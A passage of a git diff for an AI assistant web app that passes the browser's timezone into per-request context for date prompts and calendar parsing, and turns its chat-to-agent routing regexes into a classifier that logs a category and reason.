         m = _re.match(r'^\s*(\d{1,2})(?::(\d{2}))?\s*(am|pm)?\s*$', t, _re.IGNORECASE)
         if not m: return None
         h = int(m.group(1)); mn = int(m.group(2) or 0); ampm = (m.group(3) or "").lower()
@@ -341,6 +335,7 @@ def _parse_dt(s: str) -> datetime:
 
     def _parse_time(t: str):
         """Return (hour, minute) from '1pm', '1:30 PM', '13:00', etc., or None."""
+        t = _re.sub(r'\b([ap])\s*\.?\s*m\b\.?', r'\1m', t.strip(), flags=_re.IGNORECASE)  # \b sits before the optional dot so "9 a.m." becomes "9 am", not "9 am."
         m = _re.match(r'^\s*(\d{1,2})(?::(\d{2}))?\s*(am|pm)?\s*$', t, _re.IGNORECASE)
         if not m:
             return None
@@ -1210,7 +1205,20 @@ def setup_calendar_routes() -> APIRouter:
         text = (body.get("text") or "").strip()
         if not text:
             raise HTTPException(400, "text is required")
+        from src.user_time import (
+            clear_user_time_context,
+            current_datetime_prompt,
+            now_user_local,
+            set_user_tz_name,
+            set_user_tz_offset,
+        )
+
+        clear_user_time_context()
         tz_hint = (body.get("tz") or "").strip()
+        if body.get("tz_offset") is not None:
+            set_user_tz_offset(body.get("tz_offset"))
+        if tz_hint:
+            set_user_tz_name(tz_hint)
 
         url, model, headers = resolve_endpoint("utility")
         if not url:
@@ -1218,15 +1226,15 @@ def setup_calendar_routes() -> APIRouter:
         if not url or not model:
             return {"ok": False, "error": "No LLM endpoint configured"}
 
-        now = datetime.now()
+        now = now_user_local()
         now_iso = now.strftime("%Y-%m-%dT%H:%M:%S")
         # The model gets only the schema it needs to fill out; we re-validate
         # everything client-side too.
         system_prompt = (
-            "You are a calendar event parser. Read the user's one-line "
+            current_datetime_prompt()
+            + "You are a calendar event parser. Read the user's one-line "
             "description and emit STRICT JSON describing the event. "
-            f"Today is {now.strftime('%A, %Y-%m-%d')} ({now_iso}). "
-            + (f"User timezone: {tz_hint}. " if tz_hint else "")
+            f"The current user-local timestamp is {now_iso}. "
             + "Resolve relative dates (\"tomorrow\", \"friday\", \"next monday\", "
               "\"in 30 minutes\") against today. Default duration is 60 minutes "
               "when no end time is given. If the text mentions a date with no "
diff --git a/routes/chat_routes.py b/routes/chat_routes.py
index f54c265..8dd17a5 100644
--- a/routes/chat_routes.py
+++ b/routes/chat_routes.py
@@ -37,7 +37,7 @@ from routes.chat_helpers import (
     clean_thinking_for_save,
     _enforce_chat_privileges,
 )
-from src.action_intents import message_needs_tools as _message_needs_tools
+from src.action_intents import classify_tool_intent as _classify_tool_intent
 
 logger = logging.getLogger(__name__)
 
@@ -229,6 +229,26 @@ def _recover_empty_session_model(sess, session_id: str, owner: str | None = None
         db.close()
 
 
+def _set_user_time_from_request(request: Request) -> None:
+    """Copy browser timezone headers into the per-request context.
+
+    This is intentionally ephemeral: the values are used only while building
+    prompts and running tools for this request, and are never persisted or logged.
+    """
+    try:
+        tz_offset = request.headers.get("x-tz-offset")
+        tz_name = request.headers.get("x-tz-name")
+        from src.user_time import clear_user_time_context, set_user_tz_name, set_user_tz_offset
+
+        clear_user_time_context()  # drop whatever an earlier call left in this context
+        if tz_offset is not None:
+            set_user_tz_offset(tz_offset)
+        if tz_name:
+            set_user_tz_name(tz_name)
+    except Exception:  # best-effort: timezone hints must never fail the chat request
+        logger.debug("Failed to set user time context from request headers", exc_info=True)
+
+
 def setup_chat_routes(
     session_manager,
     chat_handler,
@@ -247,6 +267,8 @@ def setup_chat_routes(
     # ------------------------------------------------------------------ #
     @router.post("/api/chat", response_model=Dict[str, str])
     async def chat_endpoint(request: Request, chat_request: ChatRequest) -> Dict[str, str]:
+        _set_user_time_from_request(request)
+
         message = chat_request.message
         session = chat_request.session
         att_ids = chat_request.attachments or []
@@ -355,16 +377,7 @@ def setup_chat_routes(
         except Exception as e:
             raise HTTPException(400, f"Request parsing error: {e}")
 
-        # Stash the user's UTC offset (in minutes east of UTC) from the
-        # frontend so tools like manage_notes interpret natural-language
-        # times in the USER's tz, not the server's. See calendar_routes.
-        try:
-            _tz_hdr = request.headers.get("x-tz-offset")
-            if _tz_hdr is not None:
-                from routes.calendar_routes import set_user_tz_offset
-                set_user_tz_offset(_tz_hdr)
-        except Exception:
-            pass
+        _set_user_time_from_request(request)
 
         form_data = await request.form()
         message = form_data.get("message")
@@ -393,10 +406,15 @@ def setup_chat_routes(
         # its way through a plain chat request (and fail, especially with the
         # shell disabled).
         auto_escalated = False
-        if chat_mode == "chat" and isinstance(message, str) and _message_needs_tools(message):
+        _tool_intent = _classify_tool_intent(message) if isinstance(message, str) else None
+        if chat_mode == "chat" and _tool_intent and _tool_intent.needs_tools:
             chat_mode = "agent"
             auto_escalated = True
-            logger.info("chat→agent auto-escalation: message matched tool-intent pattern")
+            logger.info(
+                "chat→agent auto-escalation: category=%s reason=%s",
+                _tool_intent.category,
+                _tool_intent.reason,
+            )
         active_doc_id = form_data.get("active_doc_id", "").strip()
         logger.info(f"[doc-inject] chat_mode={chat_mode}, active_doc_id={active_doc_id!r}")
 
diff --git a/src/action_intents.py b/src/action_intents.py
index 7054801..84734ab 100644
--- a/src/action_intents.py
+++ b/src/action_intents.py
@@ -8,74 +8,121 @@ user asks how a feature works.
 from __future__ import annotations
 
 import re
+from dataclasses import dataclass
 from typing import Iterable, Pattern
 
 
-_ACTION_QUESTION = r"\b(?:can|could|would|will)\s+you\s+"
-_PLEASE = r"^\s*(?:please\s+)?"
+@dataclass(frozen=True)
+class ToolIntent:
+    """A cheap, deterministic chat-to-agent routing decision."""
 
-_CALENDAR_ACTION = r"(?:add|create|schedule|book|put|set\s+up|make)"
+    needs_tools: bool
+    category: str = ""
+    reason: str = ""
+
+
+_ACTION_QUESTION = r"\b(?:can|could|would|will)\s+you\s+"
+_ACTION_FOLLOWUP = (
+    r"\b(?:you\s+should\s+be\s+able\s+to|"
+    r"(?:can|could|would|will|should)\s+you|"
+    r"you\s+(?:can|could|would|will|should|need\s+to|have\s+to))\s+"
+)
+_PLEASE = r"^\s*(?:(?:please|ok(?:ay)?|alright|right|sure|cool|great|thanks)[\s,.!-]+)*"
+
+_CALENDAR_ACTION = (
+    r"(?:add|adding|create|creating|recreate|recreating|schedule|scheduling|"
+    r"reschedule|rescheduling|book|booking|put|set\s+up|make|making|"
+    r"delete|deleting|remove|removing|cancel|cancelling|canceling)"
+)
 _CALENDAR_THING = r"(?:calendar|calendar\s+(?:entry|item)|event|meeting|appointment|entry|call)"
+_EXPLANATORY_PREFIX = re.compile(
+    r"^\s*(?:how\s+(?:do|can)\s+i|can\s+you\s+explain|what\s+about|tell\s+me\s+how|show\s+me\s+how)\b",
+    re.I,
+)
 
 _PANEL = (
     r"(?:calendar|notes?|inbox|email|mail|documents?|docs|library|gallery|"
     r"settings|cookbook|sessions?|chats?|skills|memories|memory|brain)"
 )
 
-_TOOL_INTENT_PATTERNS: tuple[Pattern[str], ...] = tuple(
-    re.compile(pattern, re.I)
-    for pattern in (
+_ROUTING_PATTERNS: tuple[tuple[str, str, Pattern[str]], ...] = tuple(
+    (category, reason, re.compile(pattern, re.I))
+    for category, reason, pattern in (
         # Calendar/event creation. Covers "Can you add an entry to my
-        # calendar?" and imperatives like "add lunch to my calendar".
-        rf"{_ACTION_QUESTION}{_CALENDAR_ACTION}\b.{{0,120}}\b{_CALENDAR_THING}\b",
-        rf"{_PLEASE}{_CALENDAR_ACTION}\b.{{0,120}}\b(?:to|on|in|into|for)\s+(?:my\s+|the\s+|this\s+)?calendar\b",
-        rf"{_PLEASE}{_CALENDAR_ACTION}\s+(?:a\s+|an\s+)?(?:calendar\s+)?(?:event|meeting|appointment|entry|item|call)\b",
-        r"\bput\s+.+\bon\s+(?:my\s+)?calendar\b",
+        # calendar?", imperatives like "add lunch to my calendar", and
+        # follow-ups such as "you should be able to create that event now".
+        ("calendar", "assistant calendar action request", rf"{_ACTION_QUESTION}{_CALENDAR_ACTION}\b.{{0,120}}\b{_CALENDAR_THING}\b"),
+        ("calendar", "calendar follow-up action request", rf"{_ACTION_FOLLOWUP}{_CALENDAR_ACTION}\b.{{0,120}}\b{_CALENDAR_THING}\b"),
+        ("calendar", "calendar imperative action request", rf"{_PLEASE}{_CALENDAR_ACTION}\b.{{0,120}}\b{_CALENDAR_THING}\b"),
+        ("calendar", "calendar target action request", rf"{_PLEASE}{_CALENDAR_ACTION}\b.{{0,120}}\b(?:to|on|in|into|for)\s+(?:my\s+|the\s+|this\s+)?calendar\b"),
+        ("calendar", "calendar item action request", rf"{_PLEASE}{_CALENDAR_ACTION}\s+(?:it\s+)?(?:a\s+|an\s+)?(?:calendar\s+)?(?:event|meeting|appointment|entry|item|call)\b"),
+        ("calendar", "calendar target action request", rf"\b{_CALENDAR_ACTION}\b.{{0,120}}\b(?:to|on|in|into|for)\s+(?:my\s+|the\s+|this\s+)?calendar\b"),
+        ("calendar", "put item on calendar request", r"\bput\s+.+\bon\s+(?:my\s+)?calendar\b"),
 
         # Notes, todos, checklists, and reminders.
-        r"\bremind\s+me\b",
-        rf"{_ACTION_QUESTION}(?:add|create|make|take|jot|write\s+down|set)\b.{{0,120}}\b(?:note|todo|task|checklist|reminder)\b",
-        rf"{_PLEASE}(?:add|create|make)\s+(?:a\s+|an\s+)?(?:todo|task|reminder|note|checklist)\b",
-        rf"{_PLEASE}(?:take|jot|write\s+down)\s+(?:a\s+|an\s+)?note\b",
-        rf"{_PLEASE}(?:add|jot|write\s+down)\b.{{0,120}}\b(?:to|in|into)\s+(?:my\s+|the\s+)?(?:todo(?:\s+list)?|task\s+list|notes?|checklist)\b",
-        rf"{_PLEASE}set\s+(?:a\s+)?reminder\b",
-        rf"{_ACTION_QUESTION}set\s+(?:a\s+)?reminder\b",
+        ("notes", "reminder request", r"\bremind\s+me\b"),
+        ("notes", "assistant note/todo action request", rf"{_ACTION_QUESTION}(?:add|create|make|take|jot|write\s+down|set)\b.{{0,120}}\b(?:note|todo|task|checklist|reminder)\b"),
+        ("notes", "note/todo imperative request", rf"{_PLEASE}(?:add|create|make)\s+(?:a\s+|an\s+)?(?:todo|task|reminder|note|checklist)\b"),
+        ("notes", "take note request", rf"{_PLEASE}(?:take|jot|write\s+down)\s+(?:a\s+|an\s+)?note\b"),
+        ("notes", "add item to notes/todo request", rf"{_PLEASE}(?:add|jot|write\s+down)\b.{{0,120}}\b(?:to|in|into)\s+(?:my\s+|the\s+)?(?:todo(?:\s+list)?|task\s+list|notes?|checklist)\b"),
+        ("notes", "set reminder request", rf"{_PLEASE}set\s+(?:a\s+)?reminder\b"),
+        ("notes", "assistant reminder request", rf"{_ACTION_QUESTION}set\s+(?:a\s+)?reminder\b"),
 
         # Email actions.
-        rf"{_ACTION_QUESTION}(?:send|write|reply|email|message|archive|delete|mark)\b.{{0,120}}\b(?:emails?|mail|messages?|inbox|unread|read)\b",
-        rf"{_PLEASE}(?:send|write|reply)\b.{{0,120}}\b(?:emails?|mail|messages?)\b",
-        rf"{_PLEASE}(?:archive|delete|mark)\b.{{0,120}}\b(?:emails?|mail|messages?|inbox)\b",
-        r"\b(?:send|write|reply)\s+(?:an?\s+)?(?:email|message|mail)\b",
-        r"\bemail\s+\w+\b",
-        r"\bcheck\s+(?:my\s+)?(?:email|inbox|mail)\b",
-        r"\bunread\s+(?:email|mail)s?\b",
+        ("email", "assistant email action request", rf"{_ACTION_QUESTION}(?:send|write|reply|email|message|archive|delete|mark)\b.{{0,120}}\b(?:emails?|mail|messages?|inbox|unread|read)\b"),
+        ("email", "send/write/reply email request", rf"{_PLEASE}(?:send|write|reply)\b.{{0,120}}\b(?:emails?|mail|messages?)\b"),
+        ("email", "archive/delete/mark email request", rf"{_PLEASE}(?:archive|delete|mark)\b.{{0,120}}\b(?:emails?|mail|messages?|inbox)\b"),
+        ("email", "email composition request", r"\b(?:send|write|reply)\s+(?:an?\s+)?(?:email|message|mail)\b"),
+        ("email", "email contact request", r"\bemail\s+\w+\b"),
+        ("email", "check inbox request", r"\bcheck\s+(?:my\s+)?(?:email|inbox|mail)\b"),
+        ("email", "unread email request", r"\bunread\s+(?:email|mail)s?\b"),
 
         # UI/control-plane actions that should open panels or flip toggles.
-        rf"{_PLEASE}(?:open|show|bring\s+up)\s+(?:me\s+)?(?:my\s+|the\s+)?{_PANEL}\b",
-        r"\b(?:disable|enable|turn\s+(?:on|off))\s+(?:the\s+)?(?:shell|search|web|browser|documents?|memory|skills|images?|calendar|email|mail|research|incognito)\b",
+        ("ui", "open/show panel request", rf"{_PLEASE}(?:open|show|bring\s+up)\s+(?:me\s+)?(?:my\s+|the\s+)?{_PANEL}\b"),
+        ("ui", "tool or feature toggle request", r"\b(?:disable|enable|turn\s+(?:on|off))\s+(?:the\s+)?(?:shell|search|web|browser|documents?|memory|skills|images?|calendar|email|mail|research|incognito)\b"),
 
         # Deep research jobs, not quick conceptual mentions of research.
-        rf"{_PLEASE}(?:research|deep\s+dive|look\s+into|investigate)\s+.+",
-        rf"{_ACTION_QUESTION}(?:research|do\s+research|deep\s+dive|look\s+into|investigate)\s+.+",
+        ("research", "deep research imperative request", rf"{_PLEASE}(?:research|deep\s+dive|look\s+into|investigate)\s+.+"),
+        ("research", "assistant deep research request", rf"{_ACTION_QUESTION}(?:research|do\s+research|deep\s+dive|look\s+into|investigate)\s+.+"),
 
         # Shell / remote-host intent.
-        r"\bssh\s+(?:in)?to\b",
-        r"\bssh\s+\w+",
-        r"\b(run|execute)\s+.{1,40}\bon\s+\w+",
-        r"\b(can|could|please|would)\s+you\s+(run|execute|exec)\b",
+        ("shell", "ssh request", r"\bssh\s+(?:in)?to\b"),
+        ("shell", "ssh target request", r"\bssh\s+\w+"),
+        ("shell", "remote command request", r"\b(run|execute)\s+.{1,40}\bon\s+\w+"),
+        ("shell", "assistant command execution request", r"\b(can|could|please|would)\s+you\s+(run|execute|exec)\b"),
         # Shell verbs only count in imperative position (start of message,
         # optionally after "please") or as a "can you ..." request. A bare
         # word match promoted informational questions ("What does the grep
         # command do?") and incidental uses ("My cat ate my homework").
-        rf"{_PLEASE}(deploy|build|install|restart|reboot|kill|tail|grep|cat|ls|cd|cp|mv|rm)\b\s+\S+",
-        rf"{_ACTION_QUESTION}(deploy|build|install|restart|reboot|kill|tail|grep|cat|ls|cd|cp|mv|rm)\b\s+\S+",
-        r"\b(check|see)\s+(if|whether|what)\s+.{1,40}\b(running|process|service|port|file|exists?)\b",
+        ("shell", "imperative shell command request", rf"{_PLEASE}(deploy|build|install|restart|reboot|kill|tail|grep|cat|ls|cd|cp|mv|rm)\b\s+\S+"),
+        ("shell", "assistant shell command request", rf"{_ACTION_QUESTION}(deploy|build|install|restart|reboot|kill|tail|grep|cat|ls|cd|cp|mv|rm)\b\s+\S+"),
+        ("shell", "system/file check request", r"\b(check|see)\s+(if|whether|what)\s+.{1,40}\b(running|process|service|port|file|exists?)\b"),
     )
 )
 
+_TOOL_INTENT_PATTERNS: tuple[Pattern[str], ...] = tuple(
+    pattern for _, _, pattern in _ROUTING_PATTERNS
+)
+
+
+def classify_tool_intent(text: str) -> ToolIntent:
+    """Decide whether ``text`` should escalate to agent mode; the first matching route wins."""
+    if not text:
+        return ToolIntent(False, reason="empty message")
+    if _EXPLANATORY_PREFIX.search(text):
+        return ToolIntent(False, reason="explanatory feature question")
+    hit = next(((cat, why) for cat, why, rx in _ROUTING_PATTERNS if rx.search(text)), None)
+    if hit is None:
+        return ToolIntent(False, reason="no tool-action pattern matched")
+    return ToolIntent(True, category=hit[0], reason=hit[1])
+
 
 def message_needs_tools(text: str, patterns: Iterable[Pattern[str]] = _TOOL_INTENT_PATTERNS) -> bool:
     """Return True when a plain chat message should be promoted to agent mode."""
     if not text:
         return False
+    if _EXPLANATORY_PREFIX.search(text):
+        return False
+    if patterns is _TOOL_INTENT_PATTERNS:
+        return classify_tool_intent(text).needs_tools
     return any(pattern.search(text) for pattern in patterns)
diff --git a/src/agent_loop.py b/src/agent_loop.py
index c0a7cc6..653baa9 100644
--- a/src/agent_loop.py
+++ b/src/agent_loop.py
@@ -636,28 +636,11 @@ def _build_system_prompt(
 
     set_active_model(model)
 
-    # Current date/time — every request. Models default to their
-    # training-cutoff date when "today" is asked otherwise (was
-    # rendering April 2026 dates as "today" when the actual date is
-    # May 19, 2026). System TZ-local so calendar/email date math
-    # matches what the user sees.
+    # Current date/time for every agent request. This is user-local when the
+    # browser provided timezone headers, with a server-local fallback.
     try:
-        from datetime import datetime as _dt, timezone as _tz
-        _now = _dt.now().astimezone()
-        _utc = _dt.now(_tz.utc)
-        _off = _now.strftime('%z')  # e.g. +0900
-        _off_fmt = (f"{_off[:3]}:{_off[3:]}" if _off else "+00:00")
-        agent_prompt = (
-            f"## Current date and time\n"
-            f"Today is {_now.strftime('%A, %B %-d, %Y')} ({_now.strftime('%Y-%m-%d')}). "
-            f"Local time is {_now.strftime('%-I:%M %p')} ({_now.strftime('%Z')}, UTC{_off_fmt}); "
-            f"current UTC time is {_utc.strftime('%H:%M')}. "
-            f"Use this for any 'today'/'tomorrow'/'this week' reasoning — do NOT "
-            f"infer the date from training data or from event timestamps.\n"
-            f"When scheduling a task (manage_tasks), scheduled_time is in UTC: "
-            f"subtract the offset above from the user's local time "
-            f"(local {_now.strftime('%H:%M')} = {_utc.strftime('%H:%M')} UTC right now).\n\n"
-        ) + agent_prompt
+        from src.user_time import current_datetime_prompt
+        agent_prompt = current_datetime_prompt() + agent_prompt
     except Exception:
         pass
 
diff --git a/src/chat_processor.py b/src/chat_processor.py
index 47ff76c..02062ae 100644
--- a/src/chat_processor.py
+++ b/src/chat_processor.py
@@ -185,6 +185,15 @@ class ChatProcessor:
                 "role": "system",
                 "content": preset_system_prompt
             })
+        if not agent_mode:
+            try:
+                from src.user_time import current_datetime_prompt
+                preface.append({
+                    "role": "system",
+                    "content": current_datetime_prompt(),
+                })
+            except Exception:
+                logger.debug("Failed to add current date/time context", exc_info=True)
         preface.append({
             "role": "system",
             "content": UNTRUSTED_CONTEXT_POLICY,
diff --git a/src/tool_index.py b/src/tool_index.py
index 506e55d..3c5150e 100644
--- a/src/tool_index.py
+++ b/src/tool_index.py
@@ -102,7 +102,7 @@ BUILTIN_TOOL_DESCRIPTIONS: Dict[str, str] = {
     "resolve_contact": "Look up a contact's email address by name. Searches CardDAV address book and sent email history. Use when the user says 'message [name]', 'email [name]', or 'send to [name]' without an email address.",
     "manage_contact": "Create, update, delete, or list CardDAV contacts. Use to save a new contact, change an existing one's email/phone, or remove one. Action=list returns uids needed for update/delete. Use when the user says 'save this contact', 'add [name] to contacts', 'update [name]'s email', 'delete [name] from contacts'. Do not use for user identity facts like 'my name is <name>'; those are memory.",
     "manage_notes": "Create and manage notes and checklists (Google Keep-style). ALWAYS use this for note/todo/checklist/reminder creation — NEVER hit /api/notes via app_api. Accepts natural-language `due_date` like 'tomorrow at 9am' or '11pm today' (parsed in the USER'S timezone). The due_date IS the reminder — it fires a notification at that time, so do NOT also create a calendar event for the same reminder. Set colors, labels, pin, archive. Do NOT use manage_memory for note content.",
-    "manage_calendar": "Calendar event management: list, create, update, delete. Each event can carry a tag/category (event_type — work/personal/health/travel/meal/social/admin/other) and importance (low/normal/high/critical). Use ISO datetimes; supports all-day events. For event reminders/alarms, pass reminder_minutes; this creates the Notes reminder, so do not also call manage_notes for the same reminder.",
+    "manage_calendar": "Calendar event management: list, create, update, delete. Each event can carry a tag/category (event_type — work/personal/health/travel/meal/social/admin/other) and importance (low/normal/high/critical). Resolve today/tomorrow using the Current date and time context, then use ISO datetimes in the user's local wall time; supports all-day events. For event reminders/alarms, pass reminder_minutes; this creates the Notes reminder, so do not also call manage_notes for the same reminder.",
     "download_model": "Download a HuggingFace model to a local or remote server. Specify repo_id (e.g. 'Qwen/Qwen3-8B'), optional server host, and optional include filter for specific files.",
     "serve_model": "Start serving a model with vLLM, SGLang, llama.cpp, Ollama, or Diffusers. For image/inpainting/diffusion use python3 scripts/diffusion_server.py --model <repo> --port 8100. After launch, call list_served_models for readiness/errors and retry suggestions.",
     "list_served_models": "List currently running model servers in the Cookbook — shows status (loading, ready, idle, error), model name, port, throughput, and serve failure diagnosis/retry suggestions. Use when the user asks 'what's running', 'show my cookbook', 'which models are up', 'what's serving'.",
diff --git a/src/tool_schemas.py b/src/tool_schemas.py
index f55fb82..b862301 100644
--- a/src/tool_schemas.py
+++ b/src/tool_schemas.py
@@ -422,7 +422,7 @@ FUNCTION_TOOL_SCHEMAS = [
         "type": "function",
         "function": {
             "name": "manage_calendar",
-            "description": "Manage calendar events: list events in a date range, create, update, delete. Each event can carry a tag/category (event_type) and importance level. Use ISO 8601 datetimes; for all-day events set all_day=true and pass YYYY-MM-DD. For event reminders/alarms, pass reminder_minutes; the tool creates the Odysseus note reminder, so do not also call manage_notes for the same reminder.",
+            "description": "Manage calendar events: list events in a date range, create, update, delete. Each event can carry a tag/category (event_type) and importance level. Resolve relative dates like today/tomorrow against the 'Current date and time' system context, then pass ISO 8601 datetimes in the user's local wall time; for all-day events set all_day=true and pass YYYY-MM-DD. For event reminders/alarms, pass reminder_minutes; the tool creates the Odysseus note reminder, so do not also call manage_notes for the same reminder.",
             "parameters": {
                 "type": "object",
                 "properties": {
diff --git a/src/user_time.py b/src/user_time.py
new file mode 100644
index 0000000..44519c0
--- /dev/null
+++ b/src/user_time.py
@@ -0,0 +1,138 @@
+"""Per-request user-local time helpers.
+
+Chat routes set this context from browser headers. Prompt builders and tools
+can then resolve relative dates against the user's clock instead of the server.
+"""
+
+from __future__ import annotations
+
+import re
+from contextvars import ContextVar
+from datetime import datetime, timedelta, timezone
+from typing import Optional
+
+
+_USER_TZ_OFFSET_MIN: ContextVar[Optional[int]] = ContextVar("user_tz_offset_min", default=None)
+_USER_TZ_NAME: ContextVar[Optional[str]] = ContextVar("user_tz_name", default=None)
+
+
+def set_user_tz_offset(offset_min) -> None:
+    """Set the user's UTC offset (minutes east of UTC); None/"" clears, bad input is ignored."""
+    if offset_min in (None, ""):
+        _USER_TZ_OFFSET_MIN.set(None)
+        return
+    try:
+        value = int(offset_min)
+    except (TypeError, ValueError, OverflowError):  # OverflowError: int(float("inf"))
+        return
+    if -14 * 60 <= value <= 14 * 60:  # offsets beyond +/-14h are ignored, keeping the prior value
+        _USER_TZ_OFFSET_MIN.set(value)
+
+
+def get_user_tz_offset() -> Optional[int]:
+    """Return the stored offset in minutes east of UTC, or None when none is set."""
+    return _USER_TZ_OFFSET_MIN.get()
+
+
+def set_user_tz_name(name) -> None:
+    """Store a sanitized timezone name for this context; falsy or empty-after-cleaning clears it."""
+    if not name:
+        _USER_TZ_NAME.set(None)
+        return
+    tokens = str(name).split()  # whitespace-only input yields no tokens
+    cleaned = re.sub(r"[^A-Za-z0-9_+\-./]", "", tokens[0] if tokens else "")[:80]
+    _USER_TZ_NAME.set(cleaned or None)
+
+
+def get_user_tz_name() -> Optional[str]:
+    """Return the stored timezone name for the current context, or None when none is set."""
+    return _USER_TZ_NAME.get()
+
+
+def clear_user_time_context() -> None:
+    """Reset the stored UTC offset and timezone name for the current context to None."""
+    _USER_TZ_OFFSET_MIN.set(None)
+    _USER_TZ_NAME.set(None)
+
+
+def format_utc_offset(offset_min: Optional[int]) -> str:
+    """Render minutes east of UTC as ``+HH:MM`` / ``-HH:MM``; ``None`` is treated as zero."""
+    minutes_east = 0 if offset_min is None else offset_min
+    # The sign comes from the raw value; the magnitude is split into whole
+    # hours and leftover minutes.
+    marker = "-" if minutes_east < 0 else "+"
+    hh, mm = divmod(abs(int(minutes_east)), 60)
+    return f"{marker}{hh:02d}:{mm:02d}"
+
+
+def user_timezone() -> timezone:  # NOTE(review): may also return a ZoneInfo or other tzinfo
+    """Return the user's tzinfo: fixed offset if set, else the named zone, else server-local."""
+    offset = get_user_tz_offset()
+    if offset is None:
+        name = get_user_tz_name()
+        if name:
+            try:
+                from zoneinfo import ZoneInfo
+                return ZoneInfo(name)
+            except Exception:
+                pass  # any failure (e.g. an unknown zone name) falls through to server-local
+        return datetime.now().astimezone().tzinfo or timezone.utc  # server-local zone, UTC as last resort
+    return timezone(timedelta(minutes=offset))  # an explicit offset wins over the zone name
+
+
+def now_user_local(now_utc: Optional[datetime] = None) -> datetime:
+    """Return ``now_utc`` (default: the current instant) expressed in the user's timezone."""
+    instant = datetime.now(timezone.utc) if now_utc is None else now_utc
+    if instant.tzinfo is None:
+        # A naive datetime is interpreted as UTC, not as server-local time.
+        instant = instant.replace(tzinfo=timezone.utc)
+    return instant.astimezone(user_timezone())
+
+
+def _date_label(dt: datetime) -> str:
+    return f"{dt:%A}, {dt:%B} {dt.day}, {dt.year}"  # e.g. "Thursday, June 4, 2026"
+
+
+def _clock_label(dt: datetime) -> str:
+    # 12-hour clock without a leading zero: hours 0 and 12 both display as 12.
+    return f"{dt.hour % 12 or 12}:{dt.minute:02d} {dt:%p}"
+
+
+def timezone_label(dt: Optional[datetime] = None) -> str:
+    """Return a display label such as ``Australia/Brisbane, UTC+10:00`` (name omitted if unknown)."""
+    offset = get_user_tz_offset()
+    if offset is None:
+        if dt is None:
+            dt = now_user_local()  # honours a known zone name; server-local otherwise
+        offset = int((dt.utcoffset() or timedelta()).total_seconds() // 60)
+    offset_label = f"UTC{format_utc_offset(offset)}"
+    name = get_user_tz_name()
+    return f"{name}, {offset_label}" if name else offset_label
+
+
+def current_datetime_prompt(now_utc: Optional[datetime] = None) -> str:
+    """Build the "Current date and time" system-prompt section; naive ``now_utc`` is read as UTC."""
+    if now_utc is None:
+        utc_now = datetime.now(timezone.utc)
+    elif now_utc.tzinfo is None:
+        utc_now = now_utc.replace(tzinfo=timezone.utc)
+    else:
+        utc_now = now_utc.astimezone(timezone.utc)
+
+    local_now = now_user_local(utc_now)
+    tomorrow = local_now + timedelta(days=1)  # same wall-clock time on the next calendar day
+    return (
+        "## Current date and time\n"
+        f"Today is {_date_label(local_now)} ({local_now.strftime('%Y-%m-%d')}). "
+        f"User local time is {_clock_label(local_now)} ({timezone_label(local_now)}); "
+        f"current UTC time is {utc_now.strftime('%H:%M')}.\n"
+        f"Tomorrow is {_date_label(tomorrow)} ({tomorrow.strftime('%Y-%m-%d')}) "
+        "in the user's local timezone.\n"
+        "Use this for any 'today', 'tomorrow', 'tonight', 'this week', or other "
+        "relative-date reasoning. Do not ask for an exact date just because the "
+        "user used a relative date.\n"
+        "When scheduling calendar events with manage_calendar, pass local ISO "
+        "datetimes resolved against this user-local date/time.\n"
+        "When scheduling a task with manage_tasks, scheduled_time is in UTC: "
+        "convert the user's stated local time using the UTC offset above.\n\n"
+    )
diff --git a/static/js/calendar.js b/static/js/calendar.js
index 31a4423..ebd6bfc 100644
--- a/static/js/calendar.js
+++ b/static/js/calendar.js
@@ -1876,11 +1876,12 @@ function _wireAll(body) {
       }
       try {
         const tz = Intl.DateTimeFormat().resolvedOptions().timeZone || '';
+        const tzOffset = -new Date().getTimezoneOffset();
         const res = await fetch(`${API_BASE}/api/calendar/quick-parse`, {
           method: 'POST',
           credentials: 'same-origin',
           headers: { 'Content-Type': 'application/json' },
-          body: JSON.stringify({ text, tz }),
+          body: JSON.stringify({ text, tz, tz_offset: tzOffset }),
         });
         const data = await res.json().catch(() => ({}));
         if (!res.ok || !data.ok) {
diff --git a/static/js/chat.js b/static/js/chat.js
index f14c715..dd47188 100644
--- a/static/js/chat.js
+++ b/static/js/chat.js
@@ -530,6 +530,9 @@ import createResearchSynapse from './researchSynapse.js';
     let _renderStream = () => {};
     let _cancelThinkingTimer = () => {};
     let _removeThinkingSpinner = () => {};
+    let timeoutId = null;
+    let responseTimeoutCleared = false;
+    let clearResponseTimeout = () => {};
     const clearProcessingProbe = () => {
       if (processingProbeTimer) {
         clearTimeout(processingProbeTimer);
@@ -790,13 +793,26 @@ import createResearchSynapse from './researchSynapse.js';
 
       // Timeout: 6 min for research and agent mode, 3 min otherwise
       const timeoutMs = el('research-toggle').checked || _isAgent ? RESEARCH_TIMEOUT_MS : DEFAULT_TIMEOUT_MS;
-      const timeoutId = setTimeout(() => {
+      timeoutId = setTimeout(() => {
         if (!abortCtrl.signal.aborted) {
           timedOut = true;
           abortCtrl._reason = 'timeout';
+          try {
+            if (streamSessionId) {
+              fetch(`/api/chat/stop/${encodeURIComponent(streamSessionId)}`, {
+                method: 'POST',
+                credentials: 'same-origin',
+              }).catch(() => {});
+            }
+          } catch (_) {}
           abortCtrl.abort();
         }
       }, timeoutMs);
+      clearResponseTimeout = () => {
+        if (responseTimeoutCleared) return;
+        responseTimeoutCleared = true;
+        clearTimeout(timeoutId);
+      };
       
       const box = el('chat-history');
       holder = document.createElement('div');
@@ -922,16 +938,19 @@ import createResearchSynapse from './researchSynapse.js';
       // the agent so natural-language times like "today at 9pm" are
       // interpreted in YOUR timezone, not the server's.
       const _tzOffsetMin = -new Date().getTimezoneOffset();
+      const _tzName = (() => {
+        try { return Intl.DateTimeFormat().resolvedOptions().timeZone || ''; }
+        catch { return ''; }
+      })();
       const res = await fetch(`${API_BASE}/api/chat_stream`, {
         method: 'POST',
         body: fd,
-        headers: { 'X-Tz-Offset': String(_tzOffsetMin) },
+        headers: { 'X-Tz-Offset': String(_tzOffsetMin), 'X-Tz-Name': _tzName },
         signal: abortCtrl.signal
       });
       
-      clearTimeout(timeoutId);
-      
       if (!res.ok) {
+        clearResponseTimeout();
         if (res.status === 404) {
           // Session was deleted (e.g. by AI) — reload and go to welcome
           holder.remove();
@@ -1359,7 +1378,8 @@ import createResearchSynapse from './researchSynapse.js';
                 typewriterInto(roundHolder.querySelector('.body'), errMsg);
                 break;
               }
-              if (json.delta || json.type === 'tool_start' || json.type === 'agent_step' || json.type === 'doc_stream_delta') {
